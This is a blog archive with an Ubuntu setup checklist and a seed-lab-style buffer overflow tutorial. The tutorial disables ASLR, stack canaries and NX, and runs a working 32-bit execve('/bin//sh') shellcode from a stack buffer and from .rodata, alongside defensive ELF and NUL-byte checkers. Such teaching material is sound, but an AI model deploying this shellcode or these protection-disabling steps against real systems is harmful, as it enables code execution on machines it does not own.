
Monthly Archives: March 2017

After Ubuntu 14.04 Installation

I have been playing around with my system quite a lot and have crashed it several times. Here are a few basic software installations needed after installing Ubuntu 14.04: just a reference list to set up your work environment quickly. (I know it is only for very few ‘amigos’. Just a short reference list for me.)

1) Install VLC (keep the music in background and continue with the rest \m/)

2) Install chrome

Go to the official site of Chrome -> Downloads -> For Personal Computers -> [Download] For Linux (Debian/Ubuntu/Fedora/openSUSE) -> [check this if you have an Ubuntu distribution] 64 bit .deb (For Debian/Ubuntu) -> Accept and Install

3) Install Peda

git clone https://github.com/longld/peda.git ~/peda
echo "source ~/peda/peda.py" >> ~/.gdbinit

4) Install libc6-dev-i386 (the 32-bit C headers and libraries, needed to build with gcc -m32 on a 64-bit host)

sudo apt-get update
sudo apt-get install libc6-dev-i386

5) Install ns2, version 2.34

Follow the steps in the following link and you will be done.

http://surajpatilworld.blogspot.in/2015/02/step-by-step-installation-of-ns-234-on.html

6) Install Wireshark

You can simply use the Software Center to install it.

7) Install ghex

sudo apt-get update
sudo apt-get install ghex

8) Install the Ubuntu restricted extras for functionality such as the Flash plugin and common media codecs. Please note that some of these components are patent-encumbered or otherwise restricted and may not be legal to use in every country (kindly keep a check).

sudo apt-get install ubuntu-restricted-extras

9) LaTeX

You can again use the Software Center to install it.

Search for “latex” in the search bar. Click on “Texmaker”. Click on “Install”.

Later you might need to install other packages according to the type of document you will be creating in LaTeX. Anyway, Google is just a click away in that case.

10) Install your favourite text editor. Let’s install Sublime Text 3:

sudo add-apt-repository -y ppa:webupd8team/sublime-text-3
sudo apt-get update; sudo apt-get install -y sublime-text-installer

11) Install the gufw firewall. Ubuntu does not ship an antivirus and a desktop install rarely needs one, but it is still nice to keep a firewall and protect your system from attacks. gufw is a graphical front end for ufw, which manages the iptables rules underneath.

sudo apt-get install gufw

I will add more to the list as and how needed. For now these will do.


Posted on March 21, 2017 in Uncategorized

 

Buffer overflow: Get a shell!

Initial setup

ASLR : Address Space Layout Randomization

Ubuntu and several other Linux distributions use address space layout randomization to randomize the starting addresses of the stack, the heap and the shared libraries every time a program runs. This makes guessing the exact return address difficult; guessing addresses is one of the critical steps of a buffer overflow attack. But as our purpose is to do the buffer overflow for learning, we will disable this protection layer and work without it. We can disable address randomization, as root, using the following command:

#sysctl -w kernel.randomize_va_space=0

The setting is not persistent: it is back to the default after a reboot unless you also put kernel.randomize_va_space = 0 in /etc/sysctl.conf. To check whether randomization is on or not, run the following command as root:

# cat /proc/sys/kernel/randomize_va_space

0 means ASLR is disabled; 1 randomizes the stack, mmap regions (shared libraries) and the VDSO; 2, the default, additionally randomizes the heap (brk).

The GCC compiler implements a security mechanism called the stack protector (a descendant of StackGuard) to detect buffer overflows. It places a random canary value between the local buffers and the saved frame pointer and return address, and checks it before the function returns; a linear overflow that reaches the return address therefore also corrupts the canary, and the program aborts instead of returning into attacker-controlled memory. Ubuntu’s gcc turns this on by default. You can disable this protection when you are compiling a program using the gcc option -fno-stack-protector.

For example, to compile a program example.c with the stack protector disabled, you can use the following command:

# gcc -fno-stack-protector -o example example.c

Finally, Ubuntu uses NX protection to mark memory pages on the stack as non-executable. Binaries must declare whether they require an executable stack or not as part of the ELF program headers (the PT_GNU_STACK entry, shown as GNU_STACK by readelf -l). By default, gcc will mark all binaries as using non-executable stacks. To change this, add -z execstack to the command line in addition to the stack protector option above:

# gcc -z execstack -fno-stack-protector -o example example.c

To compile a 32-bit binary on a 64-bit host, add the flag “-m32” (this needs the 32-bit development libraries, libc6-dev-i386, from the previous post). The flag “-g” adds debugging symbols so that gdb can show source lines and variable names:

# gcc -z execstack -g -m32 -fno-stack-protector -o call_shellcode call_shellcode.c
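As an added check (my example, not from the original post), the following C program reads the ELF program headers itself and reports whether a binary was linked with an executable stack, which is exactly what -z execstack changes; it is the same information that readelf -lW <binary> | grep GNU_STACK prints. It assumes a little-endian i386 or x86-64 ELF file; the synthetic image builder at the bottom exists only so the parser can be exercised without a compiled binary, and its name and the result constants are mine.

```c
/* gnustack.c: report whether an ELF binary asks for an executable stack.
 * Added example for this post, not part of the original. It reads the
 * PT_GNU_STACK program header that `gcc -z execstack` sets to RWX.
 * Assumes a little-endian ELF file (i386 or x86-64); anything else is
 * reported as unknown.
 * Build: gcc -o gnustack gnustack.c      Run: ./gnustack ./call_shellcode
 */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define PT_GNU_STACK 0x6474e551u   /* program header type carrying stack flags */
#define PF_X 1u                    /* p_flags: executable */
#define PF_W 2u                    /* p_flags: writable */
#define PF_R 4u                    /* p_flags: readable */

enum { STACK_NX = 0, STACK_EXEC = 1, STACK_UNKNOWN = -1 };

/* Little-endian load of n bytes (n <= 8). */
static uint64_t rd(const unsigned char *p, int n)
{
    uint64_t v = 0;
    for (int i = n - 1; i >= 0; i--) v = (v << 8) | p[i];
    return v;
}

/* Little-endian store of a 32-bit value. */
static void wr32(unsigned char *p, uint32_t v)
{
    for (int i = 0; i < 4; i++) p[i] = (unsigned char)(v >> (8 * i));
}

/* Walk the program headers of the image img[0..len) and return STACK_EXEC
 * if PT_GNU_STACK has PF_X set, STACK_NX if it is present without PF_X,
 * and STACK_UNKNOWN if the data is not a little-endian ELF file or has no
 * PT_GNU_STACK header at all (on i386/x86-64 the kernel then gives the
 * process an executable stack, so "unknown" is not "safe"). */
int gnu_stack_flags(const unsigned char *img, size_t len)
{
    if (len < 52 || memcmp(img, "\x7f" "ELF", 4) != 0 || img[5] != 1)
        return STACK_UNKNOWN;                 /* img[5]: ELFDATA2LSB == 1 */
    int is64 = img[4] == 2;                   /* img[4]: ELFCLASS64 == 2 */
    if (is64 && len < 64) return STACK_UNKNOWN;
    /* Header field offsets differ between ELF32 and ELF64. */
    size_t phoff   = is64 ? rd(img + 32, 8) : rd(img + 28, 4);
    size_t phent   = is64 ? rd(img + 54, 2) : rd(img + 42, 2);
    size_t phnum   = is64 ? rd(img + 56, 2) : rd(img + 44, 2);
    size_t flagoff = is64 ? 4 : 24;           /* offset of p_flags in a Phdr */
    for (size_t i = 0; i < phnum; i++) {
        size_t off = phoff + i * phent;
        if (phent < flagoff + 4 || off < phoff || off + phent > len)
            return STACK_UNKNOWN;             /* truncated or corrupt table */
        if (rd(img + off, 4) == PT_GNU_STACK)
            return (rd(img + off + flagoff, 4) & PF_X) ? STACK_EXEC : STACK_NX;
    }
    return STACK_UNKNOWN;
}

/* Build a minimal, non-runnable ELF64 image: a 64-byte header followed by
 * one PT_GNU_STACK header carrying stack_flags. Constructed only to
 * exercise the parser. Returns the image size (120) or 0 if out is small. */
size_t make_test_elf64(unsigned char *out, size_t cap, uint32_t stack_flags)
{
    if (cap < 120) return 0;
    memset(out, 0, 120);
    memcpy(out, "\x7f" "ELF", 4);
    out[4] = 2; out[5] = 1; out[6] = 1;      /* 64-bit, little-endian, version 1 */
    out[16] = 2; out[18] = 62;               /* e_type ET_EXEC, e_machine x86-64 */
    out[32] = 64;                            /* e_phoff: table right after header */
    out[52] = 64; out[54] = 56; out[56] = 1; /* e_ehsize, e_phentsize, e_phnum */
    wr32(out + 64, PT_GNU_STACK);            /* p_type */
    wr32(out + 68, stack_flags);             /* p_flags */
    return 120;
}

/* Build a synthetic image with the given p_flags and parse it back. */
int check_synthetic(uint32_t stack_flags)
{
    unsigned char img[128];
    size_t n = make_test_elf64(img, sizeof img, stack_flags);
    return n ? gnu_stack_flags(img, n) : STACK_UNKNOWN;
}

int main(int argc, char **argv)
{
    if (argc != 2) { fprintf(stderr, "usage: %s <elf-file>\n", argv[0]); return 2; }
    FILE *f = fopen(argv[1], "rb");
    if (!f) { perror(argv[1]); return 2; }
    unsigned char *img = NULL; size_t len = 0, cap = 0;
    for (;;) {                               /* slurp the whole file */
        if (len == cap) {
            cap = cap ? cap * 2 : 1 << 16;
            img = realloc(img, cap);
            if (!img) return 2;
        }
        size_t n = fread(img + len, 1, cap - len, f);
        if (n == 0) break;
        len += n;
    }
    fclose(f);
    int r = gnu_stack_flags(img, len);
    printf("%s: stack %s\n", argv[1],
           r == STACK_EXEC ? "EXECUTABLE (RWX, as after -z execstack)" :
           r == STACK_NX   ? "non-executable (RW)" :
                             "unknown (no PT_GNU_STACK, or not a little-endian ELF)");
    free(img);
    return r == STACK_UNKNOWN ? 1 : 0;
}
```

Run it on both builds of call_shellcode (with and without -z execstack) and compare with readelf -lW; the GNU_STACK line flips between RW and RWE.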

To change the peda disassembly flavor to AT&T (the default is Intel):

$nano ~/.gdbinit

after the file gets opened, add:

# set att flavor in peda
set disassembly-flavor att

 

PART-A

Before you start the attack, you need a shellcode. Shellcode is a short piece of machine code that launches a shell. It has to be loaded into memory so that we can force the vulnerable program to jump to it. You may use your own shellcode. Consider the following program:


#include <stdio.h>
#include <unistd.h>
int main( ) {
char *name[2];
name[0] = "/bin/sh";
name[1] = NULL;
execve(name[0], name, NULL);   /* replaces this process with a shell */
return 0;
}

The shellcode that we use is just the assembly version of the above program. The following
program shows you how to launch a shell by executing a shellcode stored in a buffer.
Please compile and run the following code, and see whether a shell is obtained or not.


/* call_shellcode.c
 * A program that launches a shell by executing shellcode stored in a
 * stack buffer. Needs -z execstack, because buf lives on the stack. */
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
/* 32-bit x86 execve("/bin//sh", ["/bin//sh", NULL], NULL): 24 bytes, no
 * NUL bytes, so strcpy() copies it whole. "//sh" pads the path to 8 bytes
 * (two pushes); the kernel treats "//" like "/". */
const char code[] =
"\x31\xc0"        /* xorl  %eax,%eax                           */
"\x50"            /* pushl %eax         NUL terminator of path */
"\x68""//sh"      /* pushl $0x68732f2f  "//sh"                 */
"\x68""/bin"      /* pushl $0x6e69622f  "/bin"                 */
"\x89\xe3"        /* movl  %esp,%ebx    ebx -> "/bin//sh"      */
"\x50"            /* pushl %eax         argv[1] = NULL         */
"\x53"            /* pushl %ebx         argv[0] = path         */
"\x89\xe1"        /* movl  %esp,%ecx    ecx -> argv            */
"\x99"            /* cdq                edx = 0 (envp = NULL)  */
"\xb0\x0b"        /* movb  $0x0b,%al    syscall 11 = execve    */
"\xcd\x80"        /* int   $0x80                               */
;
int main(int argc, char **argv)
{
char buf[sizeof(code)];
strcpy(buf, code);            /* copy the shellcode onto the stack */
((void(*)( ))buf)( );         /* jump to it */
}

Compile above program

$gcc -z execstack -g -m32 -fno-stack-protector -o call_shellcode call_shellcode.c

run the above executable and you will get a shell:

$./call_shellcode
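The delivery step above only works because the 24 bytes contain no 0x00: strcpy() stops at the first NUL. The following added example (mine, not from the original post) checks that property and shows what happens to a constructed variant that encodes the execve number as movl $0xb,%eax (b8 0b 00 00 00) instead of movb $0xb,%al (b0 0b). The names good, bad, first_nul and strcpy_delivered are mine.

```c
/* nulcheck.c: why the shellcode above avoids 0x00 entirely.
 * Added example, not part of the original post. call_shellcode.c delivers
 * the payload with strcpy(), which stops at the first NUL byte, so any
 * 0x00 inside a shellcode silently truncates it. `bad` is a constructed
 * variant with the three-NUL encoding of the syscall number.
 * Build: gcc -o nulcheck nulcheck.c
 */
#include <stdio.h>
#include <string.h>

/* The post's 24-byte execve("/bin//sh") shellcode, byte for byte. */
unsigned char good[] =
    "\x31\xc0"          /* xorl  %eax,%eax      eax = 0            */
    "\x50"              /* pushl %eax           string terminator  */
    "\x68" "//sh"       /* pushl $0x68732f2f    "//sh"             */
    "\x68" "/bin"       /* pushl $0x6e69622f    "/bin"             */
    "\x89\xe3"          /* movl  %esp,%ebx      ebx = "/bin//sh"   */
    "\x50"              /* pushl %eax           argv[1] = NULL     */
    "\x53"              /* pushl %ebx           argv[0] = path     */
    "\x89\xe1"          /* movl  %esp,%ecx      ecx = argv         */
    "\x99"              /* cdq                  edx = 0 (envp)     */
    "\xb0\x0b"          /* movb  $0xb,%al       SYS_execve (11)    */
    "\xcd\x80";         /* int   $0x80                             */

/* Constructed variant: identical except for movl $0xb,%eax. */
unsigned char bad[] =
    "\x31\xc0\x50" "\x68" "//sh" "\x68" "/bin" "\x89\xe3\x50\x53\x89\xe1\x99"
    "\xb8\x0b\x00\x00\x00" /* movl $0xb,%eax: three embedded NULs */
    "\xcd\x80";

/* Index of the first 0x00 within the first len bytes, or -1 if none. */
long first_nul(const unsigned char *sc, size_t len)
{
    for (size_t i = 0; i < len; i++)
        if (sc[i] == 0) return (long)i;
    return -1;
}

/* Simulate the delivery path in call_shellcode.c: how many payload bytes
 * survive a strcpy() into a buffer that could hold all of them. */
size_t strcpy_delivered(const unsigned char *sc, size_t len)
{
    char buf[256];
    if (len >= sizeof buf) return 0;
    memset(buf, 0xAA, sizeof buf);            /* poison so truncation shows */
    strcpy(buf, (const char *)sc);            /* stops at the first NUL */
    return strlen(buf);
}

static void report(const char *name, const unsigned char *sc, size_t len)
{
    printf("%-4s length %zu, first NUL at %ld, bytes delivered by strcpy: %zu\n",
           name, len, first_nul(sc, len), strcpy_delivered(sc, len));
}

int main(void)
{
    report("good", good, sizeof good - 1);   /* 24 bytes, no NUL, 24 delivered */
    report("bad",  bad,  sizeof bad - 1);    /* 27 bytes, NUL at 22, 22 delivered */
    return 0;
}
```

The truncated copy of bad ends right after the b8 0b opcode, so the victim would execute garbage instead of int $0x80; the same constraint applies to any other byte the copy routine treats as a terminator (for gets() or scanf("%s") that includes newline and whitespace).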

PART- B

Below is a modified version of the program. Compile it without the additional flags (no -z execstack and no -fno-stack-protector), as shown after the listing.

The program, as you will see, will in fact give you a shell. Explain why this is so. What could be the reason why the following program did not require the execstack flag whereas the one above needed it?

/* call_shellcode-1.c
 * A program that launches a shell by calling shellcode stored in a const
 * global array, i.e. in the read-only data section, not on the stack. */
#include <stdlib.h>
#include <stdio.h>
const char code[] =
"\x31\xc0"
"\x50"
"\x68""//sh"
"\x68""/bin"
"\x89\xe3"
"\x50"
"\x53"
"\x89\xe1"
"\x99"
"\xb0\x0b"
"\xcd\x80";
int main(int argc, char **argv)
{
printf("Shellcode Length: %d\n", (int)sizeof(code)-1);
int (*ret)() = (int(*)())code;   /* point a function pointer at the bytes */
ret();                           /* call them in place, no copy */
return 0;
}

To compile above code:

# gcc call_shellcode-1.c -o shell -ggdb -m32

Ans:

In PART-A the shellcode is copied into buf, a local array that lives on the stack. The stack is mapped non-executable unless the binary asks for an executable stack, so jumping into buf only works when the program was linked with -z execstack.

In PART-B nothing is copied: ret points straight at code, a const global. The compiler places a const array in the read-only data section (.rodata), and the linker of this era (Ubuntu 14.04, 32-bit, non-PIE) puts .rodata into the same read-and-execute LOAD segment as .text. The bytes therefore already sit in executable memory without any special flag.

  • A writable global (char code[] without const) would go into .data, which is mapped read-write but not executable; to run code from there the program would have to change the page protection itself, e.g. with mprotect(), or copy the bytes into memory mapped with PROT_EXEC.
  • A const global lands in .rodata, which on this toolchain shares the executable segment with .text, so -z execstack is not required.

You can confirm this with readelf -lW shell: the LOAD segment with flags R E covers .rodata as well as .text. Newer binutils (2.31 and later, where -z separate-code is the default on x86) place .rodata in its own read-only, non-executable segment, so the PART-B program segfaults when built with a current toolchain.

Once you run the binary you will get a shell again. Please note that -m32 is required: the shellcode is 32-bit x86 (4-byte pushes and the int 0x80 system call interface), so built as a 64-bit binary it does not work and the program crashes with a segmentation fault.
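To see the permissions directly rather than reason from the linker script, here is an added example (mine, not from the original post) that reads /proc/self/maps to report whether the page holding a stack buffer, a writable global, a const global and a function is executable, and then shows the mprotect() route mentioned above: copy the payload into an anonymous read-write mapping, flip it to read-execute, and call it. It assumes Linux for /proc/self/maps and an i386 or x86-64 CPU for the six-byte stand-in payload (mov eax,42 ; ret), which replaces the shell so that the program can report a return value; the payload bytes, the name ret42 and the helper names are mine.

```c
/* execperms.c: which of the places a payload can live (stack buffer,
 * writable global, const global) is actually mapped executable, and the
 * portable way to execute a copied payload without -z execstack:
 * mmap read-write, copy, mprotect to read-exec (never W and X at once).
 * Added example, not part of the original post. Assumes Linux
 * (/proc/self/maps); the tiny payload executed at the end is x86 only.
 * Build: gcc -o execperms execperms.c     (no -z execstack needed)
 */
#define _GNU_SOURCE
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

/* The post's 24 bytes, in a const global (.rodata) as in PART-B and in a
 * writable global (.data) for comparison. They are never executed here. */
const char ro_code[] =
    "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";
char rw_code[] =
    "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";

/* 1 if the mapping holding addr has the x bit, 0 if it does not, -1 if
 * addr is unmapped or /proc/self/maps cannot be read. */
int addr_is_exec(const void *addr)
{
    FILE *f = fopen("/proc/self/maps", "r");
    if (!f) return -1;
    char line[512];
    int rc = -1;
    unsigned long a = (unsigned long)(uintptr_t)addr;
    while (fgets(line, sizeof line, f)) {
        unsigned long lo, hi;
        char perms[5];                        /* e.g. "r-xp" */
        if (sscanf(line, "%lx-%lx %4s", &lo, &hi, perms) != 3) continue;
        if (a >= lo && a < hi) { rc = perms[2] == 'x'; break; }
    }
    fclose(f);
    return rc;
}

/* Permission of the current stack: what PART-A's buf depends on. */
int stack_is_exec(void)
{
    char buf[16];
    return addr_is_exec(buf);
}

/* Harmless stand-in for the shell payload: mov eax,42 ; ret
 * (b8 2a 00 00 00 c3, same encoding on i386 and x86-64). */
const unsigned char ret42[] = { 0xb8, 0x2a, 0x00, 0x00, 0x00, 0xc3 };

/* Copy payload into an anonymous RW page, flip it to RX, call it and
 * return its result; -1 on failure or on a non-x86 host. This is the
 * mprotect() route the answer refers to, done W^X style. */
int run_from_rx_mapping(const unsigned char *payload, size_t len)
{
#if defined(__x86_64__) || defined(__i386__)
    long pg = sysconf(_SC_PAGESIZE);
    if (pg <= 0 || len > (size_t)pg) return -1;
    unsigned char *m = mmap(NULL, (size_t)pg, PROT_READ | PROT_WRITE,
                            MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (m == MAP_FAILED) return -1;
    memcpy(m, payload, len);
    if (mprotect(m, (size_t)pg, PROT_READ | PROT_EXEC) != 0) {
        munmap(m, (size_t)pg);
        return -1;
    }
    int (*fn)(void);
    memcpy(&fn, &m, sizeof fn);               /* object -> function pointer */
    int r = fn();
    munmap(m, (size_t)pg);
    return r;
#else
    (void)payload; (void)len;
    return -1;
#endif
}

static const char *word(int v)
{
    return v == 1 ? "executable" : v == 0 ? "not executable" : "unknown";
}

int main(void)
{
    printf("stack buffer          : %s\n", word(stack_is_exec()));
    printf("char code[]  (.data)  : %s\n", word(addr_is_exec(rw_code)));
    printf("const code[] (.rodata): %s   <- decides whether PART-B works\n",
           word(addr_is_exec(ro_code)));
    printf("a function   (.text)  : %s\n", word(addr_is_exec((const void *)addr_is_exec)));
    printf("payload via mmap+mprotect(RX) returned %d (expect 42)\n",
           run_from_rx_mapping(ret42, sizeof ret42));
    return 0;
}
```

Built with a current toolchain the const global is usually reported as not executable, which is exactly why the PART-B program stops working there; on Ubuntu 14.04's ld it shows as executable. The mmap-then-mprotect path works on either, and is the pattern JIT compilers use.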

 

 

Posted on March 15, 2017 in Uncategorized